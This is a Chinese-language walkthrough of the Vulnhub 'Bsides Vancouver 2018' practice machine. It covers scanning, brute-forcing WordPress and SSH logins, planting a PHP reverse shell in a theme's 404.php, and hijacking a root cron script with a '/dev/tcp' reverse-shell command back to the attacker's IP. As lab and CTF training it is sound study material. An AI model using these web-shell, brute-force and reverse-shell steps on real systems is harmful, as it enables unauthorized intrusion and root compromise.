Vulnhub-Bsides Vancouver 2018

0x00 准备

靶机下载:

https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/#release

双击ovf文件,导入到Vmware中,选择NAT模式

Kali:192.168.194.140

0x01 测试

首先nmap扫描同一C段:nmap 192.168.194.1/24,找到目标机器IP:192.168.194.143,且开放21、22、80端口。

访问Web页面(80端口)

使用dirsearch.py脚本进行目录扫描:

python dirsearch.py -u “http://192.168.194.143/” -e *

访问robots.txt,得到一个弃用的Wordpress的路径地址,访问首页看到了作者:john,得到一个用户名。

接着使用dirsearch.py进行扫描:

python dirsearch.py -u “192.168.194.143/backup_wordpress/” -e *

访问/readme,可以看到该站的版本为4.5一个很老的版本,现在最新已经出5.4了,这种老站已经相对很少了,但是对付老站就可以掏出神器wpscan进行漏扫。

root@kali:~# wpscan –url http://192.168.194.143/backup_wordpress/ –enumerate u

枚举出两个可用用户admin、john

访问:http://192.168.194.143/backup_wordpress/wp-login.php进行抓包爆破后台密码,载入一个常用密码字典即可。网上搜罗,最终得到john的密码是enigma

进入后台后选择“外观”->“编辑”->404 模板.php, 修改404.php文件写一个反弹Shell的PHP木马,可用Kali中自带的,路径: /usr/share/webshells/php/php-reverse-shell.php 将IP写为Kali的IP,端口为Kali端用nc监听端口。

在下方点击“Update File”更新即可,然后访问指定路径:http://192.168.194.143/backup_wordpress/wp-content/themes/twentysixteen/404.php

该路径可以看出是右边两个红圈的名字,当处于加载转动状态,回到Kali监听端即可看到反弹回Shell

接着利用python做一个交互式的TTL的终端,命令:python -c 'import pty; pty.spawn("/bin/bash")',查看当前权限是www-data,然后查看下可以登录该机器的用户有哪些。

其中存在几个拥有bash权限的用户,利用hydra尝试爆破下SSH密码,最终只得到anni的密码为princess

SSH连接登录:ssh anne@192.168.194.143 随后提权到root用户,拿到flag

第二种方法:查看定时任务,存在一个以root用户定时执行的任务

查看原有的cleanup是以一个清除Apach日志记录的,将其重新写入,注意这样拿到的Shell没有rm和vi命令,只能通过echo进行写入

echo ‘#!/bin/bash’ > cleanup

echo ‘bash -i >& /dev/tcp/192.168.194.140/4444 0>&1’ >> cleanup

然后快捷键【Ctrl】+【Shift】+【T】新开一个终端,监听4444端口,一会就收到root用户的Shell了。

发表评论

电子邮件地址不会被公开。 必填项已用*标注